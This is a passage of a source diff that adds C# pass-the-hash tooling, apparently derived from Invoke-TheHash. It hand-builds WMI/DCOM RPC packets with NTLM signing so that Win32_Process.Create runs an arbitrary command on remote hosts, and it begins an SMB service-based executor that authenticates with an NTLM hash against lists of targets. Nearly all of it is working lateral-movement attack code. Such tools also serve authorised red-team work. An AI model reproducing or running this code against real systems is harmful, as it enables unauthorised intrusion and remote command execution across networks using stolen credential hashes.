+                                                break;
+                                            case 5:
+                                                {
+                                                    sequence_number = new byte[] { 0x06, 0x00, 0x00, 0x00 };
+                                                    request_flags = new byte[] { 0x83 };
+                                                    request_auth_padding = 4;
+                                                    request_call_ID = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                                    request_context_ID = new byte[] { 0x00, 0x00 };
+                                                    request_opnum = new byte[] { 0x03, 0x00 };
+                                                    request_UUID = object_UUID;
+                                                    WMI_client_stage_next = "AlterContext";
+                                                    packet_rem_query_interface = WMIExec.DCOMRemQueryInterface(causality_ID_bytes, IPID2, new byte[] { 0x83, 0xb2, 0x96, 0xb1, 0xb4, 0xba, 0x1a, 0x10, 0xb6, 0x9c, 0x00, 0xaa, 0x00, 0x34, 0x1d, 0x07 });
+                                                    stub_data = Utilities.ConvertFromPacketOrderedDictionary(packet_rem_query_interface);
+                                                }
+                                                break;
+                                            case 6:
+                                                {
+                                                    sequence_number = new byte[] { 0x07, 0x00, 0x00, 0x00 };
+                                                    request_flags = new byte[] { 0x83 };
+                                                    request_auth_padding = 0;
+                                                    request_context_ID = new byte[] { 0x04, 0x00 };
+                                                    request_call_ID = new byte[] { 0x09, 0x00, 0x00, 0x00 };
+                                                    request_opnum = new byte[] { 0x06, 0x00 };
+                                                    request_UUID = IPID2;
+                                                    WMI_client_stage_next = "Request";
+                                                    stub_data = Utilities.CombineByteArray(new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }, causality_ID_bytes);
+                                                    stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x0d, 0x00, 0x00, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x77, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5f, 0x00, 0x70, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x63, 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                                                }
+                                                break;
+                                            case 7:
+                                                {
+                                                    sequence_number = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                                    request_flags = new byte[] { 0x83 };
+                                                    request_auth_padding = 0;
+                                                    request_context_ID = new byte[] { 0x04, 0x00 };
+                                                    request_call_ID = new byte[] { 0x10, 0x00, 0x00, 0x00 };
+                                                    request_opnum = new byte[] { 0x06, 0x00 };
+                                                    request_UUID = IPID2;
+                                                    WMI_client_stage_next = "Request";
+                                                    stub_data = Utilities.CombineByteArray(new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }, causality_ID_bytes);
+                                                    stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x0d, 0x00, 0x00, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x77, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5f, 0x00, 0x70, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x63, 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                                                }
+                                                break;
+                                            default:
+                                                {
+                                                    if (sequence_number[0] >= 8)
+                                                    {
+                                                        sequence_number = new byte[] { 0x09, 0x00, 0x00, 0x00 };
+                                                        request_auth_padding = 0;
+                                                        request_context_ID = new byte[] { 0x04, 0x00 };
+                                                        request_call_ID = new byte[] { 0x0b, 0x00, 0x00, 0x00 };
+                                                        request_opnum = new byte[] { 0x18, 0x00 };
+                                                        request_UUID = IPID2;
+                                                        byte[] stub_length = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 1769), 0, 1);
+                                                        byte[] stub_length2 = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 1727), 0, 1); ;
+                                                        byte[] stub_length3 = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 1713), 0, 1);
+                                                        byte[] command_length = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 93), 0, 1);
+                                                        byte[] command_length2 = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 16), 0, 1);
+                                                        byte[] command_bytes = Encoding.UTF8.GetBytes(command);
+
+                                                        string command_padding_check = Convert.ToString(Decimal.Divide(command.Length, 4));
+                                                        if (command_padding_check.Contains(".75"))
+                                                        {
+                                                            command_bytes = Utilities.CombineByteArray(command_bytes, new byte[] { 0x00 });
+                                                        }
+                                                        else if (command_padding_check.Contains(".5"))
+                                                        {
+                                                            command_bytes = Utilities.CombineByteArray(command_bytes, new byte[] { 0x00, 0x00 });
+                                                        }
+                                                        else if (command_padding_check.Contains(".25"))
+                                                        {
+                                                            command_bytes = Utilities.CombineByteArray(command_bytes, new byte[] { 0x00, 0x00, 0x00 });
+                                                        }
+                                                        else
+                                                        {
+                                                            command_bytes = Utilities.CombineByteArray(command_bytes, new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                                        }
+                                                        stub_data = new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
+                                                        stub_data = Utilities.CombineByteArray(stub_data, causality_ID_bytes);
+                                                        stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x0d, 0x00, 0x00, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5f, 0x00, 0x50, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x63, 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x06, 0x00, 0x00, 0x00, 0x0c, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x63, 0x00, 0x72, 0x00, 0x65, 0x00, 0x61, 0x00, 0x74, 0x00, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00 });
+                                                        stub_data = Utilities.CombineByteArray(stub_data, stub_length);
+                                                        stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00 });
+                                                        stub_data = Utilities.CombineByteArray(stub_data, stub_length);
+                                                        stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x4d, 0x45, 0x4f, 0x57, 0x04, 0x00, 0x00, 0x00, 0x81, 0xa6, 0x12, 0xdc, 0x7f, 0x73, 0xcf, 0x11, 0x88, 0x4d, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24, 0x12, 0xf8, 0x90, 0x45, 0x3a, 0x1d, 0xd0, 0x11, 0x89, 0x1f, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24, 0x00, 0x00, 0x00, 0x00 });
+                                                        stub_data = Utilities.CombineByteArray(stub_data, stub_length2);
+                                                        stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x78, 0x56, 0x34, 0x12 });
+                                                        stub_data = Utilities.CombineByteArray(stub_data, stub_length3);
+                                                        stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x02, 0x53, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x03, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x00, 0x00, 0x15, 0x01, 0x00, 0x00, 0x73, 0x01, 0x00, 0x00, 0x76, 0x02, 0x00, 0x00, 0xd4, 0x02, 0x00, 0x00, 0xb1, 0x03, 0x00, 0x00, 0x15, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x12, 0x04, 0x00, 0x80, 0x00, 0x5f, 0x5f, 0x50, 0x41, 0x52, 0x41, 0x4d, 0x45, 0x54, 0x45, 0x52, 0x53, 0x00, 0x00, 0x61, 0x62, 0x73, 0x74, 0x72, 0x61, 0x63, 0x74, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 0x4c, 0x69, 0x6e, 0x65, 0x00, 0x00, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x37, 0x00, 0x00, 0x00, 0x00, 0x49, 0x6e, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x37, 0x00, 0x00, 0x00, 0x5e, 0x00, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0x94, 0x00, 0x00, 0x00, 0x00, 0x57, 0x69, 0x6e, 0x33, 0x32, 0x41, 0x50, 0x49, 0x7c, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x20, 0x61, 0x6e, 0x64, 0x20, 0x54, 0x68, 0x72, 0x65, 0x61, 0x64, 0x20, 0x46, 0x75, 0x6e, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x7c, 0x6c, 0x70, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 0x4c, 0x69, 0x6e, 0x65, 0x20, 0x00, 0x00, 0x4d, 0x61, 0x70, 0x70, 0x69, 0x6e, 0x67, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x73, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x29, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x37, 0x00, 0x00, 0x00, 0x5e, 0x00, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0xca, 0x00, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x49, 0x44, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x59, 0x01, 0x00, 0x00, 0x5e, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0xca, 0x00, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x8c, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x11, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x43, 0x75, 0x72, 0x72, 0x65, 0x6e, 0x74, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x6f, 0x72, 0x79, 0x00, 0x00, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x85, 0x01, 0x00, 0x00, 0x00, 0x49, 0x6e, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x85, 0x01, 0x00, 0x00, 0xac, 0x01, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0xe2, 0x01, 0x00, 0x00, 0x00, 0x57, 0x69, 0x6e, 0x33, 0x32, 0x41, 0x50, 0x49, 0x7c, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x20, 0x61, 0x6e, 0x64, 0x20, 0x54, 0x68, 0x72, 0x65, 0x61, 0x64, 0x20, 0x46, 0x75, 0x6e, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x7c, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x7c, 0x6c, 0x70, 0x43, 0x75, 0x72, 0x72, 0x65, 0x6e, 0x74, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x6f, 0x72, 0x79, 0x20, 0x00, 0x00, 0x4d, 0x61, 0x70, 0x70, 0x69, 0x6e, 0x67, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x73, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x29, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x85, 0x01, 0x00, 0x00, 0xac, 0x01, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x2b, 0x02, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0xda, 0x01, 0x00, 0x00, 0x00, 0x49, 0x44, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xba, 0x02, 0x00, 0x00, 0xac, 0x01, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x2b, 0x02, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0xda, 0x01, 0x00, 0x00, 0x72, 0x02, 0x00, 0x00, 0x11, 0x03, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x53, 0x74, 0x61, 0x72, 0x74, 0x75, 0x70, 0x49, 0x6e, 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x00, 0x00, 0x6f, 0x62, 0x6a, 0x65, 0x63, 0x74, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xef, 0x02, 0x00, 0x00, 0x00, 0x49, 0x6e, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xef, 0x02, 0x00, 0x00, 0x16, 0x03, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0x4c, 0x03, 0x00, 0x00, 0x00, 0x57, 0x4d, 0x49, 0x7c, 0x57, 0x69, 0x6e, 0x33, 0x32, 0x5f, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x53, 0x74, 0x61, 0x72, 0x74, 0x75, 0x70, 0x00, 0x00, 0x4d, 0x61, 0x70, 0x70, 0x69, 0x6e, 0x67, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x73, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x29, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xef, 0x02, 0x00, 0x00, 0x16, 0x03, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x66, 0x03, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x44, 0x03, 0x00, 0x00, 0x00, 0x49, 0x44, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xf5, 0x03, 0x00, 0x00, 0x16, 0x03, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x66, 0x03, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x44, 0x03, 0x00, 0x00, 0xad, 0x03, 0x00, 0x00, 0x11, 0x03, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x6f, 0x62, 0x6a, 0x65, 0x63, 0x74, 0x3a, 0x57, 0x69, 0x6e, 0x33, 0x32, 0x5f, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x53, 0x74, 0x61, 0x72, 0x74, 0x75, 0x70 });
+                                                        stub_data = Utilities.CombineByteArray(stub_data, new byte[501]);
+                                                        stub_data = Utilities.CombineByteArray(stub_data, command_length);
+                                                        stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3c, 0x0e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x01 });
+                                                        stub_data = Utilities.CombineByteArray(stub_data, command_length2);
+                                                        stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x80, 0x00, 0x5f, 0x5f, 0x50, 0x41, 0x52, 0x41, 0x4d, 0x45, 0x54, 0x45, 0x52, 0x53, 0x00, 0x00 });
+                                                        stub_data = Utilities.CombineByteArray(stub_data, command_bytes);
+                                                        stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                                                        if (stub_data.Length < request_split_index)
+                                                        {
+                                                            request_flags = new byte[] { 0x83 };
+                                                            WMI_client_stage_next = "Result";
+                                                        }
+                                                        else
+                                                        {
+                                                            request_split = true;
+                                                            double request_split_stage_final = Math.Ceiling((double)stub_data.Length / request_split_index);
+                                                            if (request_split_stage < 2)
+                                                            {
+                                                                request_length = stub_data.Length;
+                                                                stub_data = Utilities.GetByteRange(stub_data, 0, request_split_index - 1);
+                                                                request_split_stage = 2;
+                                                                sequence_number_counter = 10;
+                                                                request_flags = new byte[] { 0x81 };
+                                                                request_split_index_tracker = request_split_index;
+                                                                WMI_client_stage_next = "Request";
+                                                            }
+                                                            else if (request_split_stage == request_split_stage_final)
+                                                            {
+                                                                request_split = false;
+                                                                sequence_number = BitConverter.GetBytes(sequence_number_counter);
+                                                                request_split_stage = 0;
+                                                                stub_data = Utilities.GetByteRange(stub_data, request_split_index_tracker, stub_data.Length);
+                                                                request_flags = new byte[] { 0x82 };
+                                                                WMI_client_stage_next = "Result";
+                                                            }
+                                                            else
+                                                            {
+                                                                request_length = stub_data.Length - request_split_index_tracker;
+                                                                stub_data = Utilities.GetByteRange(stub_data, request_split_index_tracker, request_split_index_tracker + request_split_index - 1);
+                                                                request_split_index_tracker += request_split_index;
+                                                                request_split_stage++;
+                                                                sequence_number = BitConverter.GetBytes(sequence_number_counter);
+                                                                sequence_number_counter++;
+                                                                request_flags = new byte[] { 0x80 };
+                                                                WMI_client_stage_next = "Request";
+                                                            }
+                                                        }
+
+
+                                                    }
+
+                                                }
+                                                break;
+                                        }
+                                        packet_RPC = WMIExec.RPCRequest(request_flags, stub_data.Length, 16, request_auth_padding, request_call_ID, request_context_ID, request_opnum, request_UUID);
+
+                                        if (request_split)
+                                        {
+                                            packet_RPC["RPCRequest_AllocHint"] = BitConverter.GetBytes(request_length);
+                                        }
+
+                                        packet_NTLMSSP_verifier = WMIExec.NTLMSSPVerifier(request_auth_padding, new byte[] { 0x04 }, sequence_number);
+                                        NTLMSSP_verifier = Utilities.ConvertFromPacketOrderedDictionary(packet_NTLMSSP_verifier);
+                                        RPC_Sign = Utilities.CombineByteArray(sequence_number, Utilities.ConvertFromPacketOrderedDictionary(packet_RPC));
+                                        RPC_Sign = Utilities.CombineByteArray(RPC_Sign, stub_data);
+                                        RPC_Sign = Utilities.CombineByteArray(RPC_Sign, Utilities.GetByteRange(NTLMSSP_verifier, 0, request_auth_padding + 7));
+                                        RPC_signature = HMAC_MD5.ComputeHash(RPC_Sign);
+                                        RPC_signature = Utilities.GetByteRange(RPC_signature, 0, 7);
+                                        packet_NTLMSSP_verifier["NTLMSSPVerifier_NTLMSSPVerifierChecksum"] = RPC_signature;
+                                        NTLMSSP_verifier = Utilities.ConvertFromPacketOrderedDictionary(packet_NTLMSSP_verifier);
+                                        WMI_client_send = Utilities.CombineByteArray(Utilities.ConvertFromPacketOrderedDictionary(packet_RPC), stub_data);
+                                        WMI_client_send = Utilities.CombineByteArray(WMI_client_send, NTLMSSP_verifier);
+                                        WMI_client_random_port_stream.Write(WMI_client_send, 0, WMI_client_send.Length);
+                                        WMI_client_random_port_stream.Flush();
+
+                                        if (!request_split)
+                                        {
+                                            WMI_client_random_port_stream.Read(WMI_client_receive, 0, WMI_client_receive.Length);
+                                        }
+
+                                        while (WMI_client_random_port_stream.DataAvailable)
+                                        {
+                                            WMI_client_random_port_stream.Read(WMI_client_receive, 0, WMI_client_receive.Length);
+                                            Thread.Sleep(10);
+                                        }
+                                        WMI_client_stage = WMI_client_stage_next;
+                                    }
+                                    break;
+                                case "Result":
+                                    {
+                                        while (WMI_client_random_port_stream.DataAvailable)
+                                        {
+                                            WMI_client_random_port_stream.Read(WMI_client_receive, 0, WMI_client_receive.Length);
+                                            Thread.Sleep(10);
+                                        }
+
+                                        if (WMI_client_receive[1145] != 9)
+                                        {
+                                            target_process_id = Utilities.DataLength(1141, WMI_client_receive);
+                                            success = true;
+                                        }
+
+                                        WMI_client_stage = "exit";
+                                    }
+                                    break;
+                            }
+                            Thread.Sleep(10);
+                        }
+                        WMI_client_random_port.Close();
+                        WMI_client_random_port_stream.Close();
+                    }
+                }
+                WMI_client.Close();
+                WMI_client_stream.Close();
+            }
+            if (success)
+            {
+                output.AppendLine(String.Format("Command executed with process ID {0} on {1}", target_process_id, target_long));
+            }
+            else
+            {
+                output.AppendLine("Process did not start, check your command");
+            }
+            return output.ToString();
+        }
+
+        public static bool SMBAdminCheck(string username, string hash, string domain, string target)
+        {
+            string result = SMBExecute(username, hash, domain, target, AdminCheck: true);
+            if (result.Contains(" is a local administrator on "))
+                return true;
+            else
+                return false;
+        }
+
+
+        /// <summary>
+        /// Execute a command against multiple targets using Pass the Hash and SMB
+        /// </summary>
+        /// <param name="username">The username to log on as.</param>
+        /// <param name="hash">The NTLM hash for the user.</param>
+        /// <param name="domain">The logon domain for the user.</param>
+        /// <param name="targets">The target computers to run the command on.</param>
+        /// <param name="command">The Command to execute on the target</param>
+        /// <param name="sleep">Sleeptime between actions. Set this if getting unknown failures. (default=15). </param>
+        /// <param name="ServiceName">The name to give the SMB service for execution.</param>
+        /// <param name="AdminCheck">Check only if user is Admin on targets.</param>
+        /// <param name="ComSpec">Append %COMSPEC% /C to command. (default=true)</param>
+        /// <param name="ForceSMB1">Force usage of SMBv1.</param>
+        /// <param name="debug">Include debug information in the output.</param>
+        /// <returns>Returns a string containing execution results.</returns>
+        /// <author>Scottie Austin (@checkymander)</author>
+        /// <remarks>
+        /// Based Heavily on Kevin Robertsons Invoke-TheHash toolset (Found
+        /// at https://github.com/Kevin-Robertson/Invoke-TheHash)
+        /// </remarks>
+        public static string SMBExecute(string username, string hash, string domain, List<string> targets, string command = "", int sleep = 15, string ServiceName = "", bool AdminCheck = false, bool ComSpec = true, bool ForceSMB1 = false, bool debug = false)
+        {
+            StringBuilder sb = new StringBuilder();
+            foreach (var target in targets)
+            {
+                sb.AppendLine(SMBExecute(username, hash, domain, target, command, sleep, ServiceName, AdminCheck, ComSpec, ForceSMB1, debug));
+            }
+
+            return sb.ToString();
+        }
+        /// <summary>
+        /// Execute a command against multiple targets using Pass the Hash and SMB
+        /// </summary>
+        /// <param name="username">The username to log on as.</param>
+        /// <param name="hash">The NTLM hash for the user.</param>
+        /// <param name="domain">The logon domain for the user.</param>
+        /// <param name="target">The target computer to run the command on.</param>
+        /// <param name="command">The Command to execute on the target</param>
+        /// <param name="sleep">Sleeptime between actions. Set this if getting unknown failures. (default=15). </param>
+        /// <param name="ServiceName">The name to give the SMB service for execution.</param>
+        /// <param name="AdminCheck">Check only if user is Admin on targets.</param>
+        /// <param name="ComSpec">Append %COMSPEC% /C to command. (default=true)</param>
+        /// <param name="ForceSMB1">Force usage of SMBv1.</param>
+        /// <param name="debug">Include debug information in the output.</param>
+        /// <returns>Returns a string containing execution results.</returns>
+        /// <author>Scottie Austin (@checkymander)</author>
+        /// <remarks>
+        /// Based Heavily on Kevin Robertsons Invoke-TheHash toolset (Found
+        /// at https://github.com/Kevin-Robertson/Invoke-TheHash)
+        /// </remarks>
+        public static string SMBExecute(string username, string hash, string domain, string target, string command = "", int sleep = 15, string ServiceName = "", bool AdminCheck = false, bool ComSpec = true, bool ForceSMB1 = false, bool debug = false)
+        {
+            bool debugging = true;
+
+            //Trackers
+            bool login_successful = false;
+            bool service_deleted = false;
+            bool SMBExec_failed = false;
+            bool SMB_execute = false;
+            bool SMB_signing = false;
+            string output_username;
+            string processID = BitConverter.ToString(BitConverter.GetBytes(Process.GetCurrentProcess().Id)).Replace("-", "");
+            string[] processID2 = processID.Split('-');
+            StringBuilder output = new StringBuilder();
+            string stage_current = "";
+            string stage = "";
+            int SMB2_message_ID = 0;
+            int SMB_close_service_handle_stage = 0;
+            int SMB_split_stage = 0;
+            int SMB_split_index_tracker = 0;
+            double SMB_split_stage_final = 0;
+            //Communication
+            byte[] SMBClientReceive = null;
+            //Packet Reqs
+            byte[] process_ID_Bytes = Utilities.ConvertStringToByteArray(processID.ToString());
+            byte[] SMB_session_ID = null;
+            byte[] session_key = null;
+            byte[] SMB_session_key_length = null;
+            byte[] SMB_negotiate_flags = null;
+            byte[] SMB2_tree_ID = null;
+            byte[] SMB_client_send = null;
+            byte[] SMB_FID = new byte[2];
+            byte[] SMB_service_manager_context_handle = null;
+            byte[] SCM_data = null;
+            byte[] SMB_service_context_handle = null;
+            byte[] SMB_named_pipe_bytes = null;
+            byte[] SMB_file_ID = null;
+            byte[] SMB_user_ID = null;
+            OrderedDictionary packet_SMB_header = null;
+            OrderedDictionary packet_SMB2_header = null;
+
+            if (String.IsNullOrEmpty(username) || String.IsNullOrEmpty(hash) || String.IsNullOrEmpty(target))
+            {
+                output.AppendLine("Missing Required Params");
+            }
+            else
+            {
+                if (hash.Contains(":"))
+                    hash = hash.Split(':').Last();
+            }
+            if (!string.IsNullOrEmpty(domain))
+                output_username = domain + '\\' + username;
+            else
+                output_username = username;
+
+
+            if (!AdminCheck)
+            {
